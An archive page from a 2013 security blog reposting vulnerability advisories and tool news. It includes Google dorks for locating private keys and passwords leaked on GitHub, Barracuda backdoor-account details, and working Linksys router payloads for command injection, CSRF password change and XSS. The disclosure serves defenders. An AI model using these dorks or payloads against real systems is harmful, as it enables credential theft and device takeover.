Jan 25, 2013

Github Search expose private SSH keys and other sensitive credentials.

After I read this news,  I try to use google search for it and I found some search text that useful in this case.


https://www.google.co.th/#hl=th&tbo=d&output=search&sclient=psy-ab&q=site:github.com+filetype%3Abash_history&oq=site:github.com+filetype%3Abash_history&gs_l=hp.3...844.844.0.1752.1.1.0.0.0.0.135.135.0j1.1.0...0.0...1c.1.PE2F9q66z4Q&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+content%3A%22BEGIN+RSA+PRIVATE+KEY%22&oq=site:github.com+content%3A%22BEGIN+RSA+PRIVATE+KEY%22&gs_l=hp.3...12992.25710.1.26078.23.23.0.0.0.0.225.2854.4j17j2.23.0...0.0...1c.1.SGhRDAkRATE&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+inurl%3A%22id_rsa%22&oq=site:github.com+inurl%3A%22id_rsa%22&gs_l=hp.3...94463.103374.3.103413.9.7.1.0.0.1.6580.7149.0j3j1j9-1.5.0...0.0...1c.1.i1n_l5P-b8U&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+content%3A%22password%22&oq=site:github.com+content%3A%22password%22&gs_l=hp.3...16004.20080.4.20287.18.17.0.0.0.0.263.2086.6j10j1.17.0...0.0...1c.1.ejvqzXxCd_w&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661

https://www.google.co.th/#hl=th&tbo=d&sclient=psy-ab&q=site:github.com+filetype%3Apasswd&oq=site:github.com+filetype%3Apasswd&gs_l=hp.3...3884.4729.3.4890.6.6.0.0.0.0.170.595.1j4.5.0...0.0...1c.1.eeNsIxjFWdA&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&bvm=bv.41524429,d.bmk&fp=f3b679a7ec4f0d67&biw=1280&bih=661
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 24, 2013

R00tsec Blogspot On Facebook Page

Now I created the page for feeding this blog into Facebook. If you want to look the link or feed of this blog in Facebook.com, please 'like' this page.(https://www.facebook.com/pages/R00tsecurity/477470155650211?ref=hl)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Critical SSH Backdoor in multiple Barracuda Networks

If you want to see full details, please go to the Source.

Vendor/product description:
-----------------------------
URL: https://www.barracudanetworks.com/products/

Vulnerability overview/description:
-----------------------------------
1) Backdoor accounts
Several undocumented operating system user accounts exist on the appliance.
They can be used to gain access to the appliance via the terminal but also
via SSH. (see 2)
These accounts are undocumented and can _not_ be disabled!
2) Remote access via SSH
An SSH daemon runs on the appliance, but network filtering (iptables) is used
to only allow access from whitelisted IP ranges (private and public).
The public ranges include servers run by Barracuda Networks Inc. but also
servers from other, unaffiliated entities - all of whom can access SSH on all
affected Barracuda Networks appliances exposed to the Internet.
The backdoor accounts from 1) can be used to gain shell access.
This functionality is entirely undocumented and can only be disabled via a
hidden 'expert options' dialog (see Workaround).

Proof of concept:
-----------------
URLs and other exploit code (passwords) have been removed from this advisory.
A detailed advisory will be released within a month including the omitted
information.

1) Backdoor accounts
The passwd and shadow file show that the following accounts exist.
Some passwords could be recovered (short attack with tiny wordlist):
root:x:0:0:root:/root:/bin/bash <-- UID: 0!
<hash removed>
NOT CRACKED during given time (confirmed static in tested appliances)
build:x:0:0:Build User:/root:/boot/os_tools/clone_interactive.pl <-- UID: 0!
<hash removed>
NOT CRACKED during given time
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -h now
<hash removed>
CRACKED <password removed>
product:x:700:100::/home/product:/bin/bash
<hash removed>
CRACKED <password removed>
ca:x:704:65534:ACL reset user:/home/ca:/home/emailswitch/code/firmware/current/bin/clear_acls.sh
<hash removed>
CRACKED <password removed>
support:x:705:705::/home/support:/home/product/code/firmware/current/bin/request_support.pl
<hash removed>
CRACKED <password removed>
websupport:x:706:706::/home/websupport:/home/emailswitch/code/firmware/current/bin/request_web.pl
<hash removed>
CRACKED <password removed>
qa_test:x:707:707::/home/qa_test:/root/qa_test1.pl
<hash removed>
NOT CRACKED during given time
The following users have public keys added to their authorized_keys
file:
remote:x:0:0:Remote Access:/home/remote:/bin/bash <-- UID: 0!
# cat /home/remote/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAACBAM3angjOeIjCePKw8a/zTugPKK+hoYkpQhyXY8+BN
q14nCInlcrzhavCiQCVKNTVtpW0A2hs75/QGslwrTpulsX89ZQL0Wx915iNbaf0P5sXoU
rA0iPoPoL3nIXWskjc6xj+x66svIVHxiBYpnTSaBNaJhxU5/3eK+/3sSPrAR0NAAAAFQD
u09YU0d2eG63v+zHmSIKCMZ8vnwAAAIAPaB34rhWjIRE5hz6YxU8jeEnPZPr3ZX8hbshk
asrrcQG+L0UeTGKoL7JTYQ2vu/549xXBpheiTAKunYES6RwURziz11vq6oWix3Wo6GGOb
yS53MIbyyc4DrB4zLDUI4PJFLBxwKTOBOSU7OuCH7sQ6rzaMrsDZIf6GxeTrDIN1gAAAI
AlkA1hEFFmRh7SfOkN4oGFcvZl/71PTEXnK3HZZopYW5WIqueTl6NALiq6FobY+U8b/NQ
ibvXXEinLP6dgqd/xnYYhwoUMuP5GPDhUkl+xKoBjAd+33yT4AN1ymWx/LZZ+9uQXt08k
Q3sgpXBhW6YT+rqrJLgc9l3Y2/exVGJjYA== managersupport01.barracudanetwo
rks.com
cluster:x:1000:1000::/home/cluster:/bin/bash
# cat /home/cluster/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAACBAJ5O8UhVP3lb0Mff66uHMkvcZlxPJF/7pgtcq5Qd/
7cuwqv65/BiDU2oNOWAIfaO89K+kLvrt+VY3TdemTrcRGiTZfzXeRASB9wWVI7rPPsIYs
S47lBEp7PYJANWXd6rYgfTw3fr1PYHpUBDgxOcHshmL469lDDbx6CodrwgK4e/AAAAFQD
a/pjlqnKmBtWNqBXB89J3qhb06QAAAIAiQCodsX5QqA8TBP6scOYIckkHiUbIireamxVa
U587P7uthFiMVnKrj9MTzwgFebTQQ02B9LQpXfmMdQdZi2Hb8FCwP1cuxp0yAHKqYh3ss
hCzhDq2lrw1NrAVlrkp4dqj0lvwEUp3BYf9VnveylrfiHA45hyXdXdzfxdn7/CDQQAAAI
AOtKcLIsZ30Y4HG0Qk4cYqKw8QryvS36xbvywX7Tq8/7N5D0LrjaCzBYo8cBIBxHjpePT
D7pOSgUiuXk16y8ffTYzLexSqL0wFLV5GIIxAeXhtCtIUPVXRZzTm97NiErikbfjDRx0P
PZKcOH8A1LX4Y0nLoBbnNnPvhcIXfElkow==
At least the user "product" can be used to login and get a shell on the
appliance.
It was confirmed that this user can access the MySQL database (rootlocalhost
with no password) eg. to add new users with administrative privileges to the
appliance configuration.
Furthermore it was possible to enable diagnostic/debugging functionality
which could be used to gain root access on the system. (confirmed in
Barracuda SSL VPN)

2) Remote access via SSH
An /etc/sysconfig/iptables file shows which rules are in place:
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*nat
:PREROUTING ACCEPT [4012:488438]
:POSTROUTING ACCEPT [641:40599]
:OUTPUT ACCEPT [641:40599]
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*filter
:INPUT ACCEPT [42408:13197223]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [49685:7341128]
-A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
Note:
The timestamp and the version of iptables-save suggest that these rules might
have been in place on Barracuda Networks appliances since 2003.
Users from these networks can access the SSH daemon running (by default on the
tested appliances) on port 22 e.g. by using the backdoor accounts:
* Private IP ranges
192.168.200.0/24
192.168.10.0/24
In some situations a user might be able to set his IP address (in the local
network) to one within the private ranges and then be allowed to access SSH.
* Public IP ranges
205.158.110.0/24
216.129.105.0/24
These ranges include some servers run by Barracuda Networks eg.
spam04.barracuda.com (216.129.105.22)
forum.barracudanetworks.com (216.129.105.38)
barracudacentral.org (216.129.105.40)
repsrv.barracuda.com (216.129.105.42)
mirror01.barracudacentral.com (216.129.105.94)
...
but also servers from other entities:
mail.totalpaas.com (205.158.110.135) - Domain registered by: Domains By Proxy, LLC ...
frmt1.boxitweb.com (205.158.110.132) - Domain registered by: Thor Myhrstad
static.medallia.com (205.158.110.229) - Domain registed by: Medallia Inc.
utility.connectify.net (205.158.110.171) - Domain registered by: Connectify Networks, Inc.
everest.address.com (216.129.105.202) - Domain registed by: WhitePages, Inc.
mail.tqm.bz (216.129.105.205) - Domain registered by: Total Quality Maintenance, Inc
outbound.andyforbes.com (216.129.105.212) - Domain registered by: HM hosting
...
More information about the hosts in these /24 networks can be found at:
http://cnet.robtex.com/205.158.110.html
http://cnet.robtex.com/216.129.105.html
A breach of any server in the whitelisted ranges enables an attack against all
affected Barracuda Networks appliances on the web.
Note:
The credentials from 1) (eg. "product" user) can be used to get a shell
on a appliance.



Source: http://archives.neohapsis.com/archives/fulldisclosure/2013-01/0221.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 23, 2013

Recon-ng - Reconnaissance Framework

Recon-ng

Recon-ng is a full-featured Web Reconnaisance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, us the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.
 
Source: https://bitbucket.org/LaNMaSteR53/recon-ng


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Secure SSH with Google Authenticator’s Two-Factor Authentication

If you want the full detail, please go to the Source.

1. Install Google Authenticator
- sudo apt-get install libpam-google-authenticator

2. Create an Authentication Key
- google-authenticator

3. Enter the secret key in the Google Authenticator app on your phone

4. Activate Google Authenticator
- sudo nano /etc/pam.d/sshd
- Add auth required pam_google_authenticator.so

5. Edit /etc/ssh/sshd_config
- ChallengeResponseAuthentication yes

6. Restart SSH
- sudo service ssh restart   
 

Source: http://www.howtogeek.com/121650/how-to-secure-ssh-with-google-authenticators-two-factor-authentication/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Checks whether a site is blocked by the Great Firewall of China.

Checks whether a site is blocked by the Great Firewall of China. This test checks across a number of servers from various locations in mainland China to determine if access to the site provided is possible from behind the Great Firewall of China.

This test checks for symptoms of DNS poisoning, one of the more common methods used by the Chinese government to block access to websites.

Top 10 tested domains:    1. facebook.com
   2. wikileaks.ch
   3. youtube.com
   4. twitter.com
   5. google.com
   6. gmail.com
   7. cnn.com
   8. wikipedia.org
   9. dropbox.com
   10. yahoo.com
 

Source: http://viewdns.info/chinesefirewall/?domain=github.com



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

IronWasp on Linux

IRONWASP : (from ironwasp.org)
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

Source: http://blog.anantshri.info/ironwasp-on-linux/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DNSChef 0.2 - DNS proxy (aka "Fake DNS")

DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.

Howto Setting and test it http://thesprawl.org/projects/dnschef/

Source: http://packetstormsecurity.com/files/119676/DNSChef-0.2.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Pulling Memory off an Android Device

After you have the JDK installed I would recommend making a new directory in your home directory

$ mkdir android

we will need the android adb tool. If you're on a debian-based machine you can likely grab it like so

sudo apt-get install android-tools-adb

(alternativly you can download the android sdk located here. The adb tool is located in the sdk/platform-tools)

Now we need to download the arm-eabi tool here

Note:
The arm-eabi tool is also inside the android NDK, but the NDK contains a lot of tools we won't be using. So why not just download this tool itself

Move the arm-eabi tar to your android directory then run the following

$ tar -xvf arm-eCross-eabi-2011-02-02.tar.gz

Lets make our lives ALOT easier and add our new tool to our path

export PATH=$PATH:/home/<your_username>/android/arm-eCross-eabi/bin

Note: If you close your terminal you will have to run the above command again

Now an annoying part. We have to find our device open source code online. Odds are your manufacturer has released it.  Just google for it. I'm using the droid charge in this case so i'll just google "droid charge opensource code" which brings me to Samsung's website where they host the code.

I download the code and move it to my android folder. Then i'll make a folder called source_code.

$ mkdir source_code
$ mv SCH-I510_OpenSource.zip source_code
$ cd device_code
$ unzip SCH-I510_OpenSource.zip

The zip contains multiple compressed files. One which is called SCH-I510_Kernel.tar.gz
This one is the only one I need as it contains the source code for my kernel.

$ tar -xvf SCH-I510_Kernel.tar.gz

So I now have my Kernel source folder in the following directory

~android/device_source/Kernel 

Note that yours might be different. Just look for a folder called Kernel. It will probably exist somewhere.

One last thing to download and that is Lime.  Lime is kernel module we will compile to pull memory.  Download it here

Move it to your android folder, make a dir for it, then untar it.

$ mkdir lime
$ mv lime-forensics-1.1-r14.tar.gz lime
$ tar -xvf lime-forensics-1.1-r14.tar.gz

You should now have a directory called src. Great!

Now for the fun part!

We use the tool adb to interact with our android device. Make sure your rooted android device is plugged in to your computer via usb with debug mode enabled.  (Look for it. Something like settings>applications>developer>enable debugging mode)

Go into your Kernel directory for your phone source code that you unzipped

$ cd ~/android/device_source/Kernel

First we pull the kernal config using our adb tool. Adb will need to open a port. So run it as sudo

$ sudo adb pull /proc/config.gz

You should get something similar to
151 KB/s (13434 bytes in 0.086s)

Now we unzip it and rename and change it to a hidden file. (The compiler will be looking for this)

$ gunzip config.gz
$ mv config .config

Now we prepare the kernel source for our Mod. If you've been following this tutorial, the following command should work for you

$ make ARCH=arm CROSS_COMPILE=arm-eCross-eabi- modules_prepare

The compiler might throw a few complaints. So long as it doesn't tell you arm-eCross-eabi- is missing you should be good.  You will be prompted for y/n a few times. Just keep pressing enter until it's finished.

Now we must prepare the module for compilation.  Go into your lime src directory

$ cd ~/android/lime/src

Copy this into your Makefile. If you've followed this tutorial this should work. I had to tweak it a bit but It's what worked for me.


obj-m := lime.o
lime-objs := tcp.o disk.o main.o

KDIR := ~/android/device_source/Kernel

KVER := $(shell uname -r)

PWD := $(shell pwd)

default:
# compile for local system
$(MAKE) ARCH=arm CROSS_COMPILE=arm-eCross-eabi- -C $(KDIR) M=$(PWD) modules
strip --strip-unneeded lime.ko
mv lime.ko lime-$(KVER).ko

$(MAKE) tidy

tidy:
rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
rm -rf \.tmp_versions

clean:
$(MAKE) tidy
rm -f *.ko

Up at the top make sure KDIR points to your Kernel source directory

and then type

$ make


And that ought to do it! You still might get some errors and an error that says

"strip: Unable to recognise the format of the input file `lime.ko'"

You should be fine. just do an "ls" and make sure the file lime.ko was created"

Now for the final steps.  Lets take our new kernel module we built and push it to our android device. This part is pretty much right out of the documentation.

$ sudo adb push /sdcard/lime.ko

We will transfer over netcat and usb. Yes, I realize this is a confusing statement

Lets set up a port with adb

adb forward tcp:4444 tcp:4444

Now we will interact with our device's shell over adb

$ adb shell

Login as root

# su

and run our kernal module. We will use the lime format as the memory format. (volatility will support this in the future)

# cd /sdcard
insmod lime.ko "path=tcp:4444 format=lime"

Your terminal will now hang. Adb will not start transferring the file until it has something to transfer too. Lets connect with netcat on our machine.  Open a new terminal and type

$ nc 127.0.0.1 4444 > memory.lime

Wait a few minutes depending on how much memory your phone has and bingo! You should now have a file called memory.lime on your system. String through it. Mess with it. Do whatever you want! Here is something you should note however

If you want to take memory off this phone again you need to remove our kernel module. Otherwise it will not work again (from my experience). It also may free up some space.

$ lsmod

Will show you that your module is running. To kill it type

$ rmmod lime

A big thank you to the guys who designed Lime. This tool is a beast and useful for more than just android.
Happy memory imaging!


Source:  http://thelulzkittens.blogspot.com/2013/01/pulling-memory-off-android-device.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Install Metasploit From Github

1. Install git
- apt-get install git
2. Clone the source
- git clone git://github.com/rapid7/metasploit-framework.git
3. If you want to update use git pull

Source: http://www.darkoperator.com/blog/2011/11/9/metasploit-changes-to-git.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Linksys WRT54GL v1.1 XSS / OS Command Injection

Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123"><img%20src%3d"0"%20onerror%3dalert("XSSed1")>&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================



Source: http://packetstormsecurity.com/files/119649

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CrackStation.net - Free Password Hash Cracker

Crackstation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in less only a fraction of a second. This cracking method only works for "unsalted" hashes.

Supports: LM, NTLM, md2, md4, md5, md5(md5), md5-half, sha1, sha1(sha1_bin()), sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+  

Source: http://crackstation.net/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

F5 Vulnerabilities

 F5 BIG-IP versions 11.2.0 and below suffer from an XML external entity injection (XXE) vulnerability.

F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.

Source: http://packetstormsecurity.com

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 21, 2013

SSH Log Poisoning By Brute Logic

  

 It's work when you have found Local File Inclusion.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |